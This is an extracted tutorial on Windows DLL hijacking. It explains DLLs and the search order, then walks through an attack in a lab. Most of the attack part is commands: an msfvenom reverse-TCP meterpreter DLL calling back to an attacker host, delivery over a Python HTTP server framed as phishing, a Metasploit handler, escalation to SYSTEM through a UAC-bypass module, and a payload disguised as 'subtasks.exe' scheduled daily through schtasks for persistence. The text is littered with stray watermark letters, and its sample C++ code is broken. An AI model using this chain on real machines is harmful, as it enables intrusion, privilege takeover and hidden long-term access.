DLL

HIJACKING BASICS

VIEH GROUP WWW.VIEHGROUP.COM

 Disclaimer

This document is generated by VIEH Group and

if there is any contribution or or credit, it’s
mentioned on the first page. The information
provided herein is for educational purposes
only and does not constitute legal or

p
professional advice. While we have made every

u
effort to ensure the accuracy and reliability of

o
the information presented, VIEH Group

r
disclaims any warranties or representations,

g
express or implied, regarding the
completeness, accuracy, or usefulness of this

h
document. Any reliance you place on the

e
information contained in this document is

i
strictly at your own risk. VIEH Group shall not

v
be liable for any damages arising from the use
of or reliance on this document. also, we highly

@
appreciate the source person for this
document.

Happy reading!

Content Credit: Enes Adışen

Social Media: viehgroup www.viehgroup.com [email protected]

 DLL Hijacking
Basics
DLL Hijacking is a type cyberattack where a

p
malicious actor takes advantage of a

u
system’s search order for dynamic link

o
libraries (DLL) to load and execute malicious

r
code instead of legitimate libraries. In other

g
words, it refers to tricking a program to load

h
a harmful code library instead of the
intended safe one. Before going into details,

ie
let’s take a look at DLL Files.

v
What is a DLL file?

@
DLL (stands for dynamic link library) is a file
containing reusable code and data which
multiple programs can use at the same time
to perform different functions, improving
efficiency and modularity in software
development.

Social Media: viehgroup www.viehgroup.com [email protected]

 Imagine you have a box of LEGO bricks. Each
brick functions as a unique tool that may be
used for a variety of activities. Now, certain
tools are kept in smaller boxes with names
like “drawing tools,” “building tools,” and so
on instead of everything being kept in one
large box.

up
Similar to those smaller boxes with labeling

o
are DLLs. It is a set of resources that various

r
software applications may use. When a

g
software requires a tool, it searches for it in

h
the appropriate named box (DLL). As you

e
would choose the appropriate LEGO set to

i
discover the appropriate tool for the job. One

v
DLL file can be used by different programs at
the same time.

@
Dynamic-link library is Microsoft’s
implementation of the shared library concept
in the Microsoft Windows, so if you want to
know more about this concept, you can
search for “shared libraries”.

Social Media: viehgroup www.viehgroup.com [email protected]

 DLLs are created by developers by writing
custom code that performs specific functions
(drawing images, computing math, or

p
connecting to the internet etc.) These

u
functions are similar to the tools we
discussed earlier.

ro
// MathLibrary.cpp: Defines the exported functions for the DLL.
#include "pch.h" // use stdafx.h in Visual Studio 2017 and earlier

g
#include <utility> Copy

#include <limits.h>
#include "MathLibrary.h"

h
// DLL internal state variables:
static unsigned long long previous_; // Previous value, if any

e
static unsigned long long current_; // Current sequence value
// Current seq. position
static unsigned index_;

i
// Initialize a Fibonacci relation sequence
// such that F(0) = a, F (1) = b.
// This function must be called before any other function.
void fibonacci_init(

v
const unsigned long long a,
const unsigned long long b)
{
index_ = 0;
current_ = a;
previous_ = B; // see special case when initialized
}

@
// Produce the next value in the sequence.
// Returns true on success, false on overflow.
bool fibonacci_next()

{
// check to see if we'd overflow result or position
if ((ULLONG_MAX - previous_ < current_) ||

{ (UINT_MAX == index_))
return false;
}
// Special case when index == 0, just return b value
if (index_ > 0)
{
// otherwise, calculate next sequence value
previous += current_;

}
std::swap(current_, previous_);
++index_;
return true;

}
// Get the current value in the sequence.
unsigned long long fibonacci_current()
return current_;

}
// Get the current index position in the sequence.
unsigned fibonacci_index()
{
return index_;

}
Social Media: viehgroup www.viehgroup.com [email protected]
 The above code demonstrates an
implementation of a dynamic link library that
defines functions for generating a Fibonacci
sequence that can be used by other programs
to generate Fibonacci sequences.

How DLL Works?

up
At this point we know what a DLL is and why it

o
is used. Below let’s see how a DLL works after

r
you click a program that requires it step by

g
Copy

step.

h
Loading dll into memory

e
After you click on a executable (.exe), the

i
operating system (OS) loads the program into

v
memory and starts its execution. If the
program requires a DLL, the operating system

@
will first need to load the DLL into memory.
This is done by searching for the DLL in a few
different locations, such as the system
directory, the program directory, and the
current directory. Once the DLL is found, it is
loaded into memory and made available to
the program.

Social Media: viehgroup www.viehgroup.com [email protected]

 Load-time vs. run-time dynamic linking
When you load a DLL in an application, two
methods of linking let you call the exported
DLL functions. The two methods of linking are
load-time dynamic linking and run-time
dynamic linking. — From MS Learn

Load time linking

up
o
The linker resolves all the references to

r
functions and variables in the DLL at

g
Copy

compile time.

h
This means that the program can call

e
functions in the DLL directly, without

i
having to load the DLL into memory at

v
runtime.
This makes executable file bigger, but

@
makes the program faster.
Runtime linking
The linker does not resolve all the
references to functions and variables in
the DLL at compile time.

Social Media: viehgroup www.viehgroup.com [email protected]

 Instead, it creates a stub in the program’s
executable file that calls the
LoadLibraryEx function to load the DLL
into memory at runtime.
The program can then call functions in the

p
DLL by calling the GetProcAddress

u
function to get the address of the
function in the DLL.

ro
This makes the program’s executable file

g
smaller, but it also makes the program
Copy

slower.

eh
i
DLL Search Order

v
When you start an .exe file file that requires a
DLL, The DLL loader (is a part of the operating

@
system) starts searching for that specific DLL
on the system. The files are searched
according to certain rules, known as DLL
Search Order.

Social Media: viehgroup www.viehgroup.com [email protected]

 The default DLL search order for Windows is
as follows:
1. The directory from which the application
is loaded.
2. The system directory. (example:

p
“C:\Windows\System32")

u
3. The Windows Directory (“C:\Windows.”)

o
4. The current directory.

r
5. Directories Listed in the system PATH

g
Environment Variable
Copy

6. Directories in the user PATH environment

variable

eh
i
7. The directories that are listed in the PATH

v
environment variable.

@
This concept is critical in DLL hijacking.
During this process, we can inject our own
malicious DLLs into locations where DLL
Loader searches for the innocent DLL. We will
come to this in later chapters.

Social Media: viehgroup www.viehgroup.com [email protected]

 DLL Hijacking
After having an idea about DLL files and their
working mechanism, we can dig into the
concept of DLL hijacking.

p
What is the idea of DLL hijacking?
Most of the time the main idea is to exploit

u
the search order that programs use to find

o
and load DLLs. An attacker can mislead a

r
software into loading harmful code instead of

g
Copy

the desired, genuine DLL by inserting a

h
malicious DLL in a spot where the program

e
looks for DLLs. This way an attacker can

i
escalate privileges and gain persistence on

v
the system. This is why I emphasized search
order in the previous chapter.

@
Altough i mentioned only search order
manipulation, there are several options, and
the effectiveness of each depends on how the
program is set up to load the necessary DLLs.
Potential strategies include:

Social Media: viehgroup www.viehgroup.com [email protected]

 Phantom DLLs: It works by placing a fake
malicious DLL with a name similar to a
legitimate one in a directory where a
program searches for DLLs, potentially
causing the program to load the
malicious phantom DLL instead of the

p
intended legitimate DLL.

u
DLL replacement: In DLL replacement

o
the attacker tries to swap out a

r
legitimate DLL with a malicious one. It

g
Copy

can be combined with DLL Proxying.

h
DLL Search Order Hijacking: In a search

e
order hijacking attack, an attacker

vi
manipulates the order in which a
program looks for dynamic link libraries

@
(DLLs), allowing them to store a
malicious DLL at a location that the
program searches first, resulting in the
malicious DLL being loaded instead of
the genuine one.

Social Media: viehgroup www.viehgroup.com [email protected]

 DLL Side Loading Attack: Attackers may
use side-loading DLLs to run their own
malicious payloads. Side-loading
includes controlling which DLL a
program loads, similar to DLL Search
Order Hijacking. However, attackers may

p
directly side-load their payloads by

u
putting a legitimate application in the

o
search order of a program, then calling it

r
to execute their payload(s), as opposed

g
Copy

to just planting the DLL and waiting for

h
the victim application to be executed.

ie
Finding Missing DLL Files

v
Missing DLL files are a great opportunity

@
for attackers to take advantage of their
absence. If a DLL is missing from the
system, they can try to place an imitation
of the original DLL to use for otheir own
purposes, including escalating privileges.

Social Media: viehgroup www.viehgroup.com [email protected]

 Process Monitor can be used to track
down failed DLL loadings in the system.
Here’s how to do it step by step:
1. Download Process Monitor from this
official link.
2. Unzip the file.

p
3. Click on “pocmon.exe”.

u
4. After that you will see various

o
processes going on. Click the blue

r
filter button in the top left.

g
Copy

5. You need to add two filters. The first

h
one is “Result is NAME NOT FOUND

e
Include” and the second one is

i
“PATH ends with .dll Include”

v
@
Now you can see a list of missing DLL’s in
various processes. These load failures
can be exploited by attackers in DLL
Hijacking.

Social Media: viehgroup www.viehgroup.com [email protected]

 Note: It’s impossible for me to show you
all of the approaches and methods in
DLL hijacking in this article. There are
numerous techniques to detect
vulnerable programs, DLL files and
exploit them using different methods we

p
have already discussed above.

u
Exploiting Missing DLL Files

o
r
Lets imagine a scenerio that you found a

g
Copy

vulnerable program in Windows that

h
attempts to load CFF ExplorerENU.dll

e
from the location the program is

i
installed to.

v
@
Social Media: viehgroup www.viehgroup.com [email protected]
 If you look at figure 4, you can see that
the process is trying to load a DLL from
the path “C:\Program
Files\NTCore\Explorer Suite”, which
resulting in “NAME NOT FOUND” failure.
In this example we will try to exploit this

p
missing DLL using msfvenom in Kali

u
Linux.

o
Step 1 - Create payload using msfvenom

r
To exploit missing DLL files in the target

g
Copy

machine, first we need to set up a

h
payload using msfvenom tool (optionally

e
in kali).

vi
Msfvenom is the combination of payload
generation and encoding. It replaced

@
msfpayload and msfencode on June 8th
2015. — From metasploit.com
To create a payload, we will use the
following command:

msfvenom -p windows/meterpreter/reverse_tcp -
ax86 -f dll LHOST=192.168.1.115 LPORT=4444 >
CFF_ExplorerENU.dll
Social Media: viehgroup www.viehgroup.com [email protected]
 After that you should be seeing the
payload in your computer.

up
ro
g
Copy

eh
vi
@
We will use this DLL to trick the Windows
host into loading the payload instead of
the missing one.

Social Media: viehgroup www.viehgroup.com [email protected]

 Step 2— Place DLL file to target host

In this step it is necessary to somehow

place the payload on the victim machine.
There are many different methods and it
is up to you which one to use. If you’re

p
using a virtual machine as a victim you

u
can simply drag & drop, but if you want

o
to do something closer to real life

r
scenarios you can try setting up a http

g
Copy

server and then download it by victim

h
machine assuming as if there is some

e
kind of phishing attack going on.

vi
In my example, I will host a simple http
server on kali and then assume that the

@
victim has been tricked into downloading
the malicious DLL instead of the missing
DLL.
Here is how can you host a server using
python3:
python3 -m http.server --bind
192.168.1.115
Social Media: viehgroup www.viehgroup.com [email protected]
 Now after the server goes live, victim

p
Windows7 machine has downloaded and

u
replaced the missing DLL with this evil

o
DLL file in our scenerio.

gr
Copy

eh
vi
@
Social Media: viehgroup www.viehgroup.com [email protected]
 Step 3— Get shell using metasploit
Now after we delivered the payload
successfully, we need to start up
metasploit and set it up to recieve
sessions from payload. Let’s do it step by

p
step.

u
Start metasploit using the command

o
below:

r
$sudo msfconsole

g
Copy

eh
vi
@
Social Media: viehgroup www.viehgroup.com [email protected]
 We are going to use multi/handler to
get a meterpreter shell.

use multi/handler
After typing the command above you
should be seeing this:

up
ro
g
Now we need to sey up LHOST and
Copy

h
LPORT.

e
The LHOST is the IP address of the

i
attacking computer and the LPORT is

v
the port to listen on for a connection
from the target computer. The “L” in

@
both attribute names stands for “local”.
To set LHOST you need to use your
machine’s local IP address. You can learn
it by typing ip a in terminal.
Setting LHOST:
set LHOST <YOUR LOCAL IP ADDRESS>
Social Media: viehgroup www.viehgroup.com [email protected]
 Settining LPORT: (4444 by default)
set LPORT 4444
After setting lhost and lport, we will
set our payload as:
set PAYLOAD
windows/meterpreter/reverse_tcp

p
Finally type show options to see if all

u
options are set correctly.

o
show options

r
After you should be seeing an output like

g
Copy

this:

eh
vi
@
Social Media: viehgroup www.viehgroup.com [email protected]
 Not we can run our exploit and start
listening the victim machine to see if
payload is activated or not. Type
below:
exploit
Now reverse tcp handler should be

p
started on your specified LHOST address

u
as follows:

ro
hg
At this point everything is set and all that

ie
needs to be done to give a shell to the

v
attacker machine is to run the .exe file it
is connected to and load the dll file into

@
memory.
At this point victim machine starts CFF
Explorerprogram and allow the malicious DLL to
run. As soon as the DLL file is run, it should
appear in the exploit process in metasploit.
Let’s check our metasploit terminal after victim
machine has executed the vulnerable program.

Social Media: viehgroup www.viehgroup.com [email protected]

 Yes! We got a meterpreter shell now.
Step 4— Escalating privileges with
meterpreter shell

p
We have successfully executed our

u
payload and had an access to the system

o
using meterpreter. Now let’s see what

r
can be done next.

g
We can simply start with typing sysinfo

h
to see basic information about the target

e
system and make sure we are on the right

i
track.

v
@
Type ps to see the list of active
processes in victim machine. Look for
admin privileged processes to migrate.
Social Media: viehgroup www.viehgroup.com [email protected]
 Using the migrate post module, you can
migrate to another process on the
victim.

Aftter checking active processes using

ps, we will need the PID of the process

p
we want to use. For example I will try to

u
migrato to taskhost.exe with a PID of

o
1620.

r
migrate 1620

hg
Why we migrate?: If a target system user

ie
thinks the process is strange, he can kill

v
it, kicking us out of the system.
Therefore, using the migrate command

@
to switch to safer processes like
explorer.exe or svchost.exe, which do not
draw attention to themselves, is a good
idea.
After migrating you can use
getpidcommand to see current process
that you are working on.
Social Media: viehgroup www.viehgroup.com [email protected]
 getuid command will show the real user
ID of the calling process. This way we can
tell whether we have escalated privilages
or not.

up
After entering the command we learn

o
that our current username is

r
WIN7/admin. Altough it’s an admin

g
account, we want higher privileges.

h
NT AUTHORITY\SYSTEM:It is the most

e
powerful account on a Windows local

vi
instance. In our case it’s more powerful
than WIN7/admin.

@
Use GetSystem
The GetSystem commands use a variety of
privilege escalation techniques to give
attackers access to the SYSTEM account of
a victim. If it hasn’t already been loaded,
we must first load the ‘priv’ extension
before using the getsystem command.
Social Media: viehgroup www.viehgroup.com [email protected]
 use privs
getsystem
This command may not always work
properly, and can fail. In this we need to
use other payloads exist in metasploit.

up
ro
If getsystem does not work, here is a

g
method to gain elevated privilages using

h
metasploit framework:

e
Type background to send the current

vi
Meterpreter session to
background and return to the ‘msf’
the

@
prompt
background
enter “search local exploit
suggester”. This is a post-exploitation
module that you can use to check a
system for local vulnerabilities.
search local exploit suggester
Social Media: viehgroup www.viehgroup.com [email protected]
 We will use this module:
use 0
Now let’s look at to options using

show options
up
following command:

ro
hg
e
As you can see, we need to set a

vi
SESSION. Check your active sessions
by typing:

@
sessions
After that you should be seeing active
session. We are going to use the session
we have created using our DLL payload.
Set the SESSION:
set session 1

Social Media: viehgroup www.viehgroup.com [email protected]

 Now payload is ready to run.
Run the payload with this command:
exploit
If everything goes expected, you should
see a list of vulnerabilities on the target
system.

up
ro
hg
ie
v
to
@
There are several vulnerabilities
detected on the target system. I’m going
try
“exploit/windows/local/bypassuac_eve
ntvwr”.
use
exploit/windows/local/bypassuac_eventvwr
Social Media: viehgroup www.viehgroup.com [email protected]
 Now enter show options again to see
what should we set up before running
the exploit.

up
ro
hg
We need to set session again. Set the

ie
session again and then run the exploit:

v
set session 1
run

@
Success! A new session is opened as you
can see above. Now type getsystem again
to see if it works now:
Social Media: viehgroup www.viehgroup.com [email protected]
 This time it worked. Use getuid again to see
current username:
getuid

up
Now it returns NT AUTHORITY\SYSTEM
instead of WIN7/admin. This means WE HAVE

o
ESCALATED PRIVILEGES.

r
After this point you can almost do whatever

g
you want with the system. Attack was

h
successful, we have system privileges and it’s

e
up to you to decide what to do after.

i
Lastly let’s discuss what can be done to make

v
our access to the system longer.
Step 5— Ensuring Persistence using

@
scheduled tasks
Remember that we need target program to
load DLL file to get our meterpreter shell. If
the user does not execute the program later,
our access will be interrupted. Since we have
system privileges now, it’s a good idea to find
a way to remain persistent in the system.
Social Media: viehgroup www.viehgroup.com [email protected]
 There are many persistence techniques a
hacker can use to become an advanced
persistent threat to your network. Any access,
action, or configuration changes that let them
maintain their foothold on systems (e.g.:
replacing or hijacking legitimate code, adding
startup code, implanting a malware stub, etc.)

p
can allow a hacker to achieve persistence.

u
Various methods can be implemented to

o
remain persisten on the network, including

r
using schtasks to schedule a task to execute

g
vulnerable executable file and then somehow

h
hide it from the user. Instead, I will create a
new payload and insert it to target machine

ie
using the system privileges i have gained

v
previously. Here are the steps:
Open msfvenom in a new terminal again

@
using msfvenom command.
Create a new payload. We will insert this
.exe payload to the victim later on.
msfvenom -p
windows/meterpreter/reverse_tcp -f exe
LHOST=<YOUR_LOCAL_IP> LPORT=4444
>subtasks.exe

Social Media: viehgroup www.viehgroup.com [email protected]

 The name of the payload is subtasks.exe,
because I want it to be appears as an innocent
file. You can set another name as you wish.
Switch to meterpreter session.
To upload an executable (exe) file from Kali
Linux machine to the target computer using
Meterpreter, we can use the “upload”

p
command.

u
upload /path/to/YourProgram.exe

o
/path/on/target/YourProgram.exe

gr
I will install the subsystem.exe file to

h
C:\Windows. You can specify the location as
you wish.

ie
v
Note: You can verify the upload using:

@
meterpreter > shell
C:\> dir /s /b
"C:\path\on\target\YourProgram.exe"
After that Our exe file must be installed on the
target machine.

Social Media: viehgroup www.viehgroup.com [email protected]

 This file will do the same trick as our malicious
DLL file. But since DLL files require to be
loaded by a program to work, using an .exe file
as payload is a good idea to remain persistent
on the system.

using schtasks

p
A scheduled task is a way to automate the

u
execution of a program or script at specified

o
intervals. In the context of maintaining

r
persistence, you can use a scheduled task to

g
run a script or connect back to a control

h
system periodically, ensuring that you can
regain access to the target system even if it’s

ie
restarted. This is done by using schtasks in

v
Windows. We will run our uploaded payload
daily this way. Here is how can you do it step

@
by step:
Open the session we have created and type
the following command:
shell
This way we opened a standard terminal on the
target host, in our case that’s cmd.

Social Media: viehgroup www.viehgroup.com [email protected]

 Create a scheduled task to run our new
exploit on the target computer daily:
schtasks /create /tn "subsystemprocess" /sc
daily /st 20:00 /tr
"C:\path\on\target\YourProgram.exe"
You can specify the
“C:\path\on\target\YourProgram.exe” part

p
according to the location of the payload you

u
downloaded.

o
This command above schedules a daily task on

r
the target system that executes a specified

g
program you specified every day at 8:00 PM.

h
This approach could be used as a way to gain
persistence on the target system, ensuring

ie
that the specified program runs automatically

v
at the specified time.

@
Social Media: viehgroup www.viehgroup.com [email protected]